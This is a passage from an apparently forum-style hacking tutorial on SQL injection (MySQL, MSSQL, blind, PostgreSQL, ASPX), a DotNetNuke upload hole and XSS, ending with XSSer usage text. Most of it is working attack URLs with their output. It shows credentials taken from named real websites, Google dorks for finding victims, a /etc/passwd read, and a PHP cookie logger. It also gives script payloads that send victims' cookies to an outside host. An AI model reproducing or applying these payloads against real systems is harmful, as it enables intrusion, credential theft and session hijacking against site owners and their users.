9) Taking data from columns We got: id, name, surname, username, password, level. We need only username and password. Instead of group_concat(column_name) we put group_concat(username,0x3a,password) 0x3a stands for to make space between user and pw. Instead of from+information_schema.columns+where+table_name=0x7573657273-- we put +from+users-- and we have link: Code: http://site.com/book.php?id=- 141+union+select+all+1,group_concat(username,0x3a,password),3,4,5,6,7+from+us ers-- and result e.g.: Code: sebrezovski:1533562 seratum:seratum coach:53.21.1985. biga:biga which is users and passwords from this site. 10) Filter bypassing In case when you write union+select+all says "not accessible" then change it to UnIoN+sElEcT+aLl On some sites space is restricted so you can put + or /**/ (/* start of comment in php and finish */) On some sites there is also restricted database version so you can use unhex(hex(version())) 11) Site protection from SQL Injection Just put this code in your script: Code: if(!is_numeric($_GET['id'])) { echo 'It is gonna write text when some try to add /' or and+1=2'; }
SQL Injection - Load File : You found site with SQL vulnerability, now you can try to access table mysql.user and file privileges. To so which is user and do we have user privileges we are adding 'user' instead of a vulnerable column and at end of URL adding '+from+mysql.user--'. It should look like this: Code: http://www.site.com/index.php?id=1+union+select+all+1,2,user,4+from+mysql.use r-- If you get username, it means that you have access to mysql.user table and you can continue with this tut. Now to see if we have file privileges we have to instead of 'user' add 'concat(user,0x3a,file_priv)' and of course '+from+mysql.user--' Now when on page usernames and file priv. are listed you must find username which was written at start, when you was writing 'user' in column, when you find it and if besides him shows 'Y' which is Yes. You have privileges. Load File: All we have to do is to write on vulnerable column load_file('FILE NAME'). We gonna try with /etc/passwd, so we type in vulnerable column 'load_file('/etc/passwd'). Which looks like this: Code: http://www.site.com/index.php?id=1+union+select+all+1,2,load_file('/etc/passw d'),4-- If it give us error we can convert file in Char or Hex, but if we do it we must delete " ' " in file name. Hex e.g. If we convert file name in Hex, before file name we will add '0x' Code: http://www.site.com/index.php?id=1+union+select+all+1,2,load_file(0x2f6574632 f706173737764),4+from+mysql.user-- Hex code '2f6574632f706173737764' works for '/etc/passwd'. It is recommended for Hex: Code:
www.string-functions.com/string-hex.aspx If you decide to convert file in Char then add 'load_file(char(converted file to char))' Which looks like: Code: http://www.site.com/index.php?id=1+union+select+all+1,2,load_file(char(47,101 ,116,99,47,112,97,115,115,119,100),4-- Where ' 47,101,116,99,47,112,97,115,115,119,100 ' works for '/etc/passwd' Char converter: Code: http://pookey.co.uk/binary.php
MSSQL Injection : 1) Finding number of columns I will use: Code: http://www.site.com/sr/page/member.asp?id=234 To find column number we gonna use order by function. We will add +order+by+5-- at end of link. Code: http://www.site.com/sr/page/member.asp?id=234+order+by+5-- So we will get this error: Code: Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 5 is out of range of the number of items in the select list. /sr/page/member.asp, line 38 which means that there is less then 5 columns, lets try with 4. We get same error, so we gonna try with 3 and we get next error: Code: Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'order'. /sr/page/member.asp, line 44 Which means that there is 3 columns. 2) Finding database version To find database version we are using @@version. Code: http://www.site.com/sr/page/member.asp?id=- 234+union+select+all+1,@@version,3-- and we get: Code: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53 Copyright (c) 1988-2003 Microsoft Corporation Desktop Engine on
Windows NT 5.2 (Build 3790: Service Pack 2) ' to a column of data type int. /sr/page/member.asp, line 38 and from here we can see database version. 3) Finding table name With MSSQL Injection it is not possible to get all tables at once, we must go 1 by 1. Code: http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,table_name,3 +from+information_schema.tables-- and we get: Code: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Country' to a column of data type int. /sr/page/member.asp, line 38 and we can see that we have a table called 'Country'. Now we have to find other tables. We are going to use not+in function. So we have link: Code: http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,table_name,3 +from+information_schema.tables +where+table_name+not+in('Country')-- and we get: Code: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Admin' to a column of data type int. /sr/page/member.asp, line 38 and from here we can see that we have a Admin table. 4) Finding column name It is same for columns. We can not get all columns at once, so we have to do it 1 by 1. In this case we will use where+table_name='Admin'--. So we have link: Code: http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,column_name, 3+from+information_schema.colum ns+where+table_name='Admin'-- and we have error: Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'USERNAME' to a column of data type int. /sr/page/member.asp, line 38 From here we can see that we have column USERNAME. Now we need rest of the columns so we gonna use again not+in function. Code: http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,column_name, 3+from+information_schema.colum ns+where+table_name='Admin'+and+column_name+not+in('USERNAME')-- and we get: Code: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'PASSWD' to a column of data type int. /sr/page/member.asp, line 38 So columns is PASSWD. 5) Taking data from columns Now we have to put name of table instead of table_name and everything after from we are entering the name of the table. Code: http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,USERNAME,3+f rom+Admin-- We get username OjuZwqAul. It is same for password: Code: http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,PASSWD,3+fro m+Admin-- We get password M7sWt2!2uq.
Blind SQL Injection : 1) Blind SQL Injection? Difference between SQL Injection and Blind SQL Injection is that Blind SQL Injection is not writing any errors, any table and column names or column content. So that is why it is called Blind SQL. You are just messing with part of site disappearing - image, text, etc... In Blind Injection we don't use --i/* */. 2) Site vulnerability check We have link: Code: http://www.site.com/index.php?id=1 We will add and 1=2 Code: http://www.site.com/index.php?id=1+and+1=2 If any part of page disappear, it means that site is vulnerable. 3) Finding database version As we said already in this method nothing is gonna be showed, so we gonna say that database version is 4. If part of site disappear it means that version is not 4, but if everything on page stay as it should it means that version is 4. We gonna use function @@version. Code: http://www.site.com/index.php?id=1+and+substring(@@version,1,1)=4 If page is loaded as it should then version is 4, if not, then we will try: Code: http://www.site.com/index.php?id=1+and+substring(@@version,1,1)=5 4) MYSQL user First we will check are we able to use select because it is blocked sometimes. Code: http://www.site.com/index.php?id=1+and+(select+1)=1 If page is loaded normally we can use select, but if not then we can't use it. Now we will check do we have MYSQL user access. Code: http://www.site.com/index.php?id=1+and+(SELECT+*+from+mysq.user+limit+0,1)=1 Same as everything else, if page is loaded normally we have access to mysql.user, if not then we don't have. mysql.user is useful to get hash password or use load_file() and OUTFILE.
5) Finding table name To find table names all we have to do is guess. First we gonna find table name then after column name from table. We have link and we are gonna try to get names of different tables. If page is loaded normally it means that table name is there and exists. Code: http://www.site.com/index.php?id=1+and+(select+1+from+ime_tabele+limit+0,1)=1 Our main objective is to to find data from admin table, we can also use: Code: admin administrator member login members adm user users tbl_admin 6) Finding column name Now when we found name of table we wanted it is time to find column name. We doing same as for table. There is name matching, if page is loaded normally then column exists. We need logging data so commonly columns gonna be: Code: username admin admin_username uname user nick password pwrod admin_password pw pass Link that we use for columns is: Code: http://www.sajt.com/index.php?id=1+and+(select+substring(concat(1,ime_kolone) ,1,1)from+ime_tabele+limit+0,1)=1 7) Taking data from columns In whole Blind SQL this gonna be most bored and longest part. Here we gonna need ASCII table. Code: http://www.asciitable.com/
We will look only for DEC and CHR ASCII tables. First we gonna get username, getting letter by letter. So we need to guess DEC for some letter, e.g. for A it is 65. We have link: Code: http://www.site.com/index.php?id=1+and+ascii(substring((select+concat(column_ name)+from+column_name+ limit+0,1)1,1))>from DEC number If page load normally we found are real letter for username. To find our second letter change +limit+0,1 to +limit+1,1. So now we are guessing second letter... It is same for password... So after long long time we get username and password. If there is more users and if you want to get their passwords too you will have to add where function. So it should look like: Code: http://www.site.com/index.php?id=1+and+ascii(substring((select+concat(column_ name)+from+column_name+ where+column_name=something+limit+0,1)1,1))>from DEC letter To use where for second column_name we usually using id, but we can also use other stuff. e.g. for id: Code: http://www.site.com/index.php?id=1+and+ascii(substring((select+concat(column_ name)+from+column_name+ where+id=1+limit+0,1)1,1))>from DEC letter 8) Taking data from columns using sqlmap As you noticed already that you need a lot of time to get data from columns I would suggest you to use sqlmap. Download: Code: http://sqlmap.org/ Python download: Code: http://www.python.org/download/ Now we have to find directory where sqlmap is located. Start>run>cmd and find sqlmap directory using cd function. Function to start sqlmap for getting data with Blind SQL Injection for windows is: Code: sqlmap.py -u "http://site.com/index.php?id=1" -p id -a "./txt/user- agents.txt" -v1 --string "Posted 3-3-2008" -e "(SELECT concat(name_username_columns,0x3a,name_password_columns) from table_name)" NOTE: for unix put python before sqlmal.py So it should look like: Code:
python sqlmap.py -u "http://site.com/index.php?id=1" -p id -a "./txt/user- agents.txt" -v1 --string "Posted 3-3-2008" -e "(SELECT concat(name_username_columns,0x3a,name_password_columns) from table_name)" If there is more users as I said then use id: Code: sqlmap.py -u "http://site.com/index.php?id=1" -p id -a "./txt/user- agents.txt" -v1 --string "Posted 3-3-2008" -e "(SELECT concat(name_username_columns,0x3a,name_password_columns) from table_name where id=1)" After -u you put link. After -p you put parameter which is vulnerable (in our case id). -a we are using for some random user agen-t from txt/user-agents.txt -v1 is verbose After --string stavljamo something that sqlmap is gonna recognize that he found letter (some part of text who dissapear if case is false). -e is command that we want to execute. In our case this one: Code: SELECT concat(name_username_columns,0x3a,name_password_columns) from table_name where userid=1
Postgre SQL Injection : 1) Postgre SQL Injection? Postgre SQL Injection is almost same as SQL Injection. Difference is in Postgre base, not MySQL. It is a bit complicated attack then usually SQL Injection. There is some other functions that we will use, you will see. 1) Finding vulnerable sites Finding site vulnerability is same as usual SQL Injection, which means that we can use Google dorks. Here is some: Code: inurl:faq.php?id= inurl:event.php?id= inurl:index.php?id= 3) Site vulnerability check You found site that may be vulnerable. To check if site is vulnerable we will add ' at end of link. Code: http://www.link.com/page.php?page=1' So if on page we get: Code: Warning: pg_query() [function.pg-query]: Query failed: ERROR: syntax error at or near or some part of page disappear then site is vulnerable. 4) Finding number of columns So we know that site is vulnerable, now we need to find column number. We will do it with union function this time. Our link: Code: http://www.link.com/page.php?page=1+union+select+all+null--+- If page is loaded normally that means that there is more columns. Code: http://www.link.com/page.php?page=1+union+select+all+null,null,null,null from dual-- We are adding null all the time till we get error. If we get error with 7 null, it means that we have 6 columns, which means 6 nulls.
5) Finding vulnerable columns It is just so easy to find column vulnerability. Null = 0, which means that everything you put instead of certain null, if nothing happens it means that columns is not usable. That is how we gonna find vulnerable column. So: Code: http://www.link.com/page.php?page=1+union+select+all+current_database(),null, null,null--+- If there is nothing listed, it means that column is not usable we will move on next, and this one back to null. 6) Finding database version We are doing this with version() function. Link will show us the version: Code: http://www.link.com/page.php?page=1+union+select+all+version(),null,null,null --+- we will get something like: Code: PostgreSQL 9.0.4 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Ubuntu 4.4.3-4ubuntu5) 4.4.3, 32-bit 7) Finding table name Same as usual SQL Injection, only diff. is that instead of column number we have null. So it should look like: Code: http://www.link.com/page.php?page=1+union+select+all table_name,null,null,null+from+information_schema.tables--+- We will get table names also the columns from tables. 8) Finding column name It is also easy, and there is no big difference. This is how it should look like: Code: http://www.link.com/page.php?page=1+union+select+all column_name,null,null,null+from+information_schema.columns+where+table_name=u ser s--+- Sometimes this wont work so we need to convert = from ascii in decimal. You can use this site:
Code: http://easycalculation.com/ascii-hex.php So we have link: Code: http://www.link.com/page.php?page=1+union+select+all+column_name,null,null,nu ll+from+information_sch ema.columns+where+table_name||CHR(61)||users--+- 9) Taking data from columns Also almost same as usual SQL Injection: Code: http://www.link.com/page.php?page=1+union+select+all+username||CHR(58)||passw ord+from+users--+-
Error based Postgre SQL Injection : 1) Error based Postgre SQL Injection? Error based Postgre SQL Injection is type of web attack releated to Postgre SQL base. Difference is that you can get all tables, columns and values from columns etc. As title says attack is based on errors, and all results will be shown in errors. 2) Finding vulnerable sites Use Google dorks: Code: inurl:faq.php?id= inurl:event.php?id= inurl:index.php?id= 3) Site vulnerability check Add ' at end of link: Code: http://www.link.com/page.php?page=1' so if we get: Code: Warning: pg_query() [function.pg-query]: Query failed: ERROR: syntax error at or near site is vulnerable. 4) Finding database version Use version() function. In this type of attack query looks a bit complicated then usual SQL Injection so don't get confused. Code: http://www.link.com/page.php?page=1+and+1=cast(version()+as+int)-- If function is loaded successfully you will get this on page: Code: Warning: pg_query() [function.pg-query]: Query failed: ERROR: invalid input syntax for integer: "PostgreSQL 9.0.4 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Ubuntu 4.4.3-4ubuntu5) 4.4.3, 32-bit" from where we get database version: Code:
PostgreSQL 9.0.4 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Ubuntu 4.4.3-4ubuntu5) 4.4.3, 32-bit 5) Finding table name As I said at start we are not able to get all tables in same time so we gonna use limit and offset functions. We will use offset to say which result from base we want to list. Our link: Code: http://www.link.com/page.php?page=1+and+1=cast((select+table_name+from+inform ation_schema.tables+limit+1+offset+0)+as+int)-- on page we will get this error: Code: Warning: pg_query() [function.pg-query]: Query failed: ERROR: invalid input syntax for integer: "pg_type" from this we have table pg_type. to get next table we gonna change offset to 1: Code: http://www.link.com/page.php?page=1+and+1=cast((select+table_name+from+inform ation_schema.tables+limit+1+offset+1)+as+int)-- and we gonna get table like pg_attribute. 6) Finding column name First you have to do is to convert table name into decimal. We will use: Code: http://easycalculation.com/ascii-hex.php type string admin and you will get decimal code: Code: 97 100 109 105 110 We will change this code a bit, so it should look like this: Code: CHR(97)+||+CHR(100)+||+CHR(109)+||+CHR(105)+||+CHR(110) Now we will put it for table names and get columns. Code: http://www.link.com/page.php?page=1+and+1=cast((select+column_name+from+infor mation_schema.columns+w here+table_name=CHR(97)+||+CHR(100)+||+CHR(109)+||+CHR(105)+||+CHR(110)+limit +1 +offset+0)+as+int)--
and we will get column id. We gonna change offset all the time till site back us on home page, which means that there is no more columns in that table. 7) Taking data from columns We found column username and password and now we want to get data from column. Code: http://www.link.com/page.php?page=1+and+1=cast((select+username+||CHR(58)||+p assword+from+admin+limit+1+offset+0)+as+int)-- and we will get this: Code: admin:21232f297a57a5a743894a0e4a801fc3 CHR(58) presents two points ( and we use to get two columns at same time. NOTE: (Regard to whole tutorial) from now I'm not gonna explane it detailed, 'cause I think you should figure it out till now already. So I'm gonna use pics and codes only.
SQL Injection on ASPX : 1) Site vulnerability check Vulnerable link: Code: http://pothys.com/ImageDisplay.aspx?Id=1535&Prod=SilkCotton We will add order by 1--: Code: http://pothys.com/ImageDisplay.aspx?Id=1535&Prod=SilkCotton order by 1-- If you get page error go to: Code: http://pothys.com/ImageDisplay.aspx?Id=1535 2) Finding column name Go to: Code: http://pothys.com/ImageDisplay.aspx?Id=1535 having 1=1
3) Finding table name Code: http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 table_name from information_schema.tables)) We want admin table, so we type next: Code: http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Tab_FinalOrder'))) admin table name is AdminMaster 4) Finding columns in admin table
Code: http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name = 'AdminMaster')) Code: http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name = 'AdminMaster' and column_name not in ('Admin_name'))) Columns names:
5) Finding username and password Code: http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 Admin_name from AdminMaster)) Code: http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 Admin_password from AdminMaster)) Code: Username: admin Password: pothys!@#
Dot net nuke : DNN is gallery where you can upload on site and in there you can hold pictures and have like "online gallery". That gallery have hole in itself so you can use it to upload files on site with extension: *.gif, *.jpg, *.pdf, *.txt, *.swf.. Google dork to find vulnerable sites: Code: inurl:fck/fcklinkgallery.aspx I'm going to use this site: Code: http://kellyballancephotography.com/providers/htmleditorproviders/fck/fcklink gallery.aspx Now if page is loaded it will look like this: which means that we can continue. Now we choose option 3 -> File (A File On Your Site) and we type javascript to upload file. Code:
javascript:__doPostBack('ctlURL$cmdUpload','') Choose File and Text button Upload Selected File will show up. *on this site letter color matched with background so you will have to select whole page (CTRL+A) and you will see upload button. Upload file and access it by going to sitelink.com/portals/0/filename.extension -> Code: http://kellyballancephotography.com/portals/0/config.txt
XSS : 1) XSS? XSS lets attacker to execute Javascript code. XSS is shortcut of Cross Site Scripting. You can use XSS for many ways. For simple Javascript executing commands, or you can use it to steal cookies. We are Injecting Cookies so we can login somewhere w/o password. 2) Required stuff Mozila FireFox: Code: http://www.mozilla.org/en-US/products/download.html?product=firefox- 3.0.5&os=win&lang=en-GB Add-on Firebug: Code: https://addons.mozilla.org/en-US/firefox/addon/firebug/ Add-on FireCookie: Code: https://addons.mozilla.org/en-US/firefox/addon/firecookie/ Add-on Live HTTP Headers: Code: https://addons.mozilla.org/en- US/firefox/downloads/file/28118/live_http_headers-0.14-fx+sm.xpi It is recommended to have primary knowledge of Javascripts. 3) Testing XSS vulnerability Sites on which we can use this method are sites where is text input and submit button and on sites where you can use GET method to print something. e.g. of GET method: Code: www.sitecom/index.php?page=<script>alert("XSS")</script> Command to check site vulnerability is: Code: <script>alert("XSS")</script> Now I will explain what this command is doing: <script> - opening script tag alert("XSS") - window will pop-up saying "XSS"
</script> - close script tag 4) XSS types Cookie Stealing - we are stealing cookies from some user (commonly admin), and input cookie in our browser so when we login to site we are gonna be logged in alrdy. Cross-Site Request Forgery - we are sending some commands without knowing username. XSS Worms - it is "evil" script that have possibility to spread over whole site. Door-Forwarding - script makes iframe which will exploit something or start download some virus, rat, keylogger, istealer, etc... Keylogging - you know what keylogging is. 5) Cookie Stealing For cookie stealing we will need: -Vulnerable site -Web-host for scripts -php script attach this script on some hosting: cookie.php Code: <?php $cookie = $HTTP_GET_VARS["cookie"]; $file = fopen('cookielog.txt', 'a'); fwrite($file, $cookie."n"); ?> script executing: Code: <script>document.location="http://www.link.com/cookie.php?cookie=" + document.cookie;</script> ili <script>location.href="http://www.link.com/cookie.php?cookie=" + document.cookie;</script> ili <script>window.open('http://www.link.com/cookie.php?cookie=' + document.cookie;)</script> ili <script>window.location='http://www.link.com/cookie.php?cookie=' + document.cookie;</script> How this works?
When some user log on page with your cookie logger and you save his cookie. Then we take cookie and use it. So here is how we do it: 1) Open Mozilla 2) Open Add-on Fire bug 3) Type cookie name and value. Here is one: Code: PHPSESSID=db3e4e100ab6bb912de1b80c4eed7898 from this cookie title is PHPSESSID from this cookie value is b3e4e100ab6bb912de1b80c4eed7898 6) Filter bypassing
1) Deleting script tag e.g. if we type <script>alert("XSS")</script> and he put only command alert("XSS"). This script delete tags <script> and </script> Here is also how to bypass protection: Instead of <script>alert("XSS")</script> we will add <scr<script>ipt>alert("XSS")</scr</script>ipt> 2) magic_quotes Explained here: Code: http://en.wikipedia.org/wiki/Magic_quotes If you type <script>alert("XSS")</script> and it prints <script>alert("XSS")</script> then it is magic_quotes protection. It is a bit harder to bypass magic_quotes protection. It works over String.fromCharCode. Here is example: This is link of our cookie logger: http://link.com/cookie.php we would use <script>location.href="http://www.link.com/cookie.php?cookie=" + document.cookie;</script> into: Code: <scr<script>ipt>location.href=String.fromCharCode(104,116,116,112,58,47,47,11 9,119,119,46,108 ,105,110,107,46,99,111,109,47,99,111,111,107,105,101,46,112,104,112,63,99,111 ,1 11,107,105,101,61,)+document.cookie;</scr</script>ipt> This works when you add code ' or " and when you use integer you do not use ' or " and here: http://www.link.com/cookie.php?cookie= we also converted decimal code with this tool: Code: Ascii to Decimal http://pookey.co.uk/binary.php 6) Bypass XSS Filters [1] Types of filters : [+]Bypass magic_quotes_gpc (if it's on ) [+]Bypass with cryption in full html [+]Bypass with Obfuscation [+]Bypass with trying around method [+]Bypass magic_quotes_gpc When magic_quotes_gpc is on, it means that the server doesn'tallow, ", / and ' (it depends)
to bypass it we use : String.fromCharCode() We write our code, in the () crypted in ASCII exemple : String.fromCharCode(107, 51, 110, 122, 48) (Here I crypted k3nz0 in ascii : 107, 51, 110, 122, 48 And we use it : <script>String.fromCharCode(107, 51, 110, 122, 48)</script> We will see : k3nz0 We bypassed magic_quotes_gpc :) [+] Bypass with cryption in full html : Very simple, we have to encodeour codein full HTTP! Our code: <script>alert('i am here')</script> And in full HTTP : %3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%69%20%6 1%6D%20%68%65%72%65%27%29%3C%2F%73%63%72%69%70%74%3E Now, you can inject it :) ! Notice that you can use the tool "Coder" to do encode it in full HTTP We bypassed filter. [+] Bypass with Obfuscation : Very simple too, this filter, don'tallows for exemple these words : -script -alert To bypass it, you change "script" with for exemple "sCriPt", and "alert" with "ALerT" ! For exemple : <ScriPt>ALeRt("i am here")</scriPt> We bypassed the filter. [+] Bypass with trying around method : Generally, it is in the searchs scripts, we just add "> at the begining to close current fields : exemple : http://target.com/search.php?search="><script>alert("hello")</script>
7) XSSER Framework Download : http://sourceforge.net/projects/xsser/ Usage xsser [OPTIONS] [-u |-i |-d ] [-g |-p |-c ] [Request(s)] [Vector(s)] [Bypasser(s)] [Technique(s)] [Final Injection(s)] Options: --version show program's version number and exit -h, --help show this help message and exit -s, --statistics show advanced statistics output results -v, --verbose verbose (default: no) --gtk launch XSSer GTK Interface *Special Features*: You can choose Vector(s) and Bypasser(s) to inject code with this extra special features: --imx=IMX create a false image with XSS code embedded --fla=FLASH create a false .swf file with XSS code embedded *Select Target(s)*: At least one of these options has to be specified to set the source to get target(s) urls from. You need to choose to run XSSer: -u URL, --url=URL Enter target(s) to audit -i READFILE Read target URLs from a file -d DORK Process search engine dork results as target urls
--De=DORK_ENGINE Search engine to use for dorking (bing, altavista, yahoo, baidu, yandex, youdao, webcrawler,ask, etc. See dork.py file to check for available engines) *Select type of HTTP/HTTPS Connection(s)*: These options can be used to specify which parameter(s) we want to use like payload to inject code. -g GETDATA Enter payload to audit using GET. (ex: '/menu.php?q=') -p POSTDATA Enter payload to audit using POST. (ex: 'foo=1&bar=') -c CRAWLING Number of urls to crawl on target(s): 1-99999 --Cw=CRAWLING_WIDTH Deeping level of crawler: 1-5 --Cl Crawl only local target(s) urls (default TRUE) *Configure Request(s)*: These options can be used to specify how to connect to target(s) payload(s). You can select multiple: --cookie=COOKIE Change your HTTP Cookie header --user-agent=AGENT Change your HTTP User-Agent header (default SPOOFED) --referer=REFERER Use another HTTP Referer header (default NONE) --headers=HEADERS Extra HTTP headers newline separated --auth-type=ATYPE HTTP Authentication type (value Basic or Digest) --auth-cred=ACRED HTTP Authentication credentials (value name:password) --proxy=PROXY Use proxy server (tor: http://localhost:8118) --timeout=TIMEOUT Select your Timeout (default 30) --delay=DELAY Delay in seconds between each HTTP request (default 8) --threads=THREADS Maximum number of concurrent HTTP requests (default 5)
--retries=RETRIES Retries when the connection timeouts (default 3) *Select Vector(s)*: These options can be used to specify a XSS vector source code to inject in each payload. Important, if you don't want to try to inject a common XSS vector, used by default. Choose only one option: --payload=SCRIPT OWN - Insert your XSS construction -manually- --auto AUTO - Insert XSSer 'reported' vectors from file *Select Bypasser(s)*: These options can be used to encode selected vector(s) to try to bypass all possible anti-XSS filters on target(s) code and some IPS rules, if the target use it. Also, can be combined with other techniques to provide encoding: --Str Use method String.FromCharCode() --Une Use function Unescape() --Mix Mix String.FromCharCode() and Unescape() --Dec Use Decimal encoding --Hex Use Hexadecimal encoding --Hes Use Hexadecimal encoding, with semicolons --Dwo Encode vectors IP addresses in DWORD --Doo Encode vectors IP addresses in Octal --Cem Try -manually- different Character Encoding mutations (reverse obfuscation: good) -> (ex:'Mix,Une,Str,Hex') *Special Technique(s)*: These options can be used to try to inject code using different type of XSS techniques. You can select multiple:
--Coo COO - Cross Site Scripting Cookie injection --Xsa XSA - Cross Site Agent Scripting --Xsr XSR - Cross Site Referer Scripting --Dcp DCP - Data Control Protocol injections --Dom DOM - Use Anchor Stealth (DOM shadows!) --Ind IND - HTTP Response Splitting Induced code --Anchor ANC - Use Anchor Stealth payloader (DOM shadows!) *Select Final injection(s)*: These options can be used to specify the final code to inject in vulnerable target(s). Important, if you want to exploit on-the-wild your discovered vulnerabilities. Choose only one option: --Fp=FINALPAYLOAD OWN - Insert your final code to inject -manually- --Fr=FINALREMOTE REMOTE - Insert your final code to inject -remotelly- --Doss DOSs - XSS Denial of service (server) injection --Dos DOS - XSS Denial of service (client) injection --B64 B64 - Base64 code encoding in META tag (rfc2397) *Special Final injection(s)*: These options can be used to execute some 'special' injection(s) in vulnerable target(s). You can select multiple and combine with your final code (except with DCP code): --Onm ONM - Use onMouseMove() event to inject code --Ifr IFR - Use "iframe" source tag to inject code *Miscellaneous*:
--silent inhibit console output results --update check for XSSer latest stable version --save output all results directly to template (XSSlist.dat) --xml=FILEXML output 'positives' to aXML file (--xml filename.xml) --publish output 'positives' to Social Networks (identi.ca) --short=SHORTURLS display -final code- shortered (tinyurl, is.gd) --launch launch a browser at the end with each XSS discovered Example : * Simple injectionfromURL: $ pythonxsser.py -u"http://host.com" ------------------- * Simple injectionfromFile,withtor proxy and spoofingHTTP Refererheaders: $ pythonxsser.py -i "file.txt"--proxy"http://127.0.0.1:8118" --referer"666.666.666.666" ------------------- * Multiple injectionsfromURL,with automatic payloading,usingtor proxy, injectingonpayloads character encodingin "Hexadecimal",withverbose outputand saving resultsto file (XSSlist.dat): $ pythonxsser.py -u"http://host.com" --proxy"http://127.0.0.1:8118" --auto--Hex --verbose-w ------------------- * Multiple injectionsfromURL,with automatic payloading,usingcaracter encoding mutations (first, change payload to hexadecimal;second,change to StringFromCharCode the first encoding;third, reencode to Hexadecimal the second encoding),withHTTP User-Agentspoofed,changingtimeoutto "20" and using multithreads(5 threads): $ pythonxsser.py -u"http://host.com" --auto--Cem"Hex,Str,Hex"--user-agent"XSSer!!"--timeout"20" --threads"5" ------------------- * Advance injectionfrom File,payloadingyour -own- payload and using Unescape() character encodingto bypass filters: $ pythonxsser.py -i "urls.txt"--payload 'a="get";b="URL("";c="javascript:";d="alert('XSS');")";eval(a+b+c+d);'--Une -------------------
* InjectionfromDork selecting"duck" engine (XSSerStorm!): $ pythonxsser.py --De "duck"-d"search.php?" ------------------- * InjectionfromCrawler with deep3 and 4 pagesto see (XSSerSpider!): $ pythonxsser.py -c3--Cw=4-u"http://host.com" ------------------- * Simple injectionfromURL, usingPOST, with statistics results: $ pythonxsser.py -u"http://host.com"-p"index.php?target=search&subtarget=top&searchstring=" -s ------------------- * Multiple injectionsfromURL to a parameter sendingwith GET, usingautomatic payloading,with IP Octal payloading ofuscationand printeringresults ina "tinyurl" shorteredlink(ready for share!): $ pythonxsser.py -u"http://host.com" -g"bs/?q="--auto--Doo--shorttinyurl ------------------- * Simple injectionfromURL, usingGET, injectinga vector in Cookie parameter, trying to use a DOM shadow space (noserver logging!) and ifexistsany "hole",applyingyour manual final payload "malicious" code (readyfor real attacks!): $ pythonxsser.py -u"http://host.com" -g"bs/?q="--Coo--Dom--Fr="!enteryourfinal injectioncode here!" ------------------- * Simple injectionfromURL, usingGET and trying to generate with resultsa "malicious" shorteredlink (is.gd) witha valid DoS (DenegationOfService) browser clientpayload: $ pythonxsser.py -u"http://host.com" -g"bs/?q="--Dos--short"is.gd" ------------------- * Multiple injectionstomultiple places,extractingtargets from a list in a FILE, applying automatic payloading,changing timeoutto "20" and usingmultithreads(5 threads),increasingdelaybetween petitionsto 10 seconds,injectingparametersin HTTP USer-Agent,HTTP Refererand in Cookie parameters, usingproxy Tor, with IP Octal ofuscation,with statisticsresults,in verbose mode and creating shorteredlinks(tinyurl) of any valid injectingpayloadsfound. (real playingmode!): $ pythonxsser.py -i "list_of_url_targets.txt" --auto--timeout"20" --threads"5"--delay"10"--Xsa--Xsr-- Coo --proxy"http://127.0.0.1:8118" --Doo-s --verbose --Dos--short"tinyurl" ------------------- * Injectionofuser XSS vector directlyin a malicious -fake- image created "onthe wild",and ready to be uploaded. $ pythonxsser.py --Imx"test.png"--payload"!enteryourmaliciousinjectioncode here!" ------------------- * Report output 'positives' injectionsofa dorkingsearch (using"ask" dorker) directly to a XML file. $ pythonxsser.py -d"login.php"--De "ask"--xml "security_report_XSSer_Dork_cuil.xml" ------------------- * Publishoutput'positives' injectionsofadorking search (using"duck" dorker) directlyto
http://identi.ca (federatedXSSpentestingbotnet) $ pythonxsser.py -d"login.php"--De "duck"--publish ------------------- * Create a .swfmovie with XSS code injected $ pythonxsser.py --fla"name_of_file" ------------------- * Senda pre-checkinghashto see if target will generate -false positive- results $ pythonxsser.py -u"host.com"--hash ------------------- * Multiple fuzzinginjectionsfromurl,includingDCP injectionsandexploitingour "own" code,spoofed in a shorteredlink, on positive resultsfounded.XSSreal-time exploiting. $ pythonxsser.py -u"host.com"--auto--Dcp--Fp"enter_your_code_here" --short"is.gd" ------------------- * ExploitingBase64 code encodingin META tag (rfc2397) in a manual payload of a vulnerable target. $ pythonxsser.py -u"host.com"-g"vulnerable_path"--payload"valid_vector_injected" --B64 ------------------- * Exploitingour "own" -remote code- ina payload discoveredusingfuzzingand launch it in a browser directly $ pythonxsser.py -u"host.com"-g"vulnerable_path"--auto--Fr"my_host/path/code.js" --launch
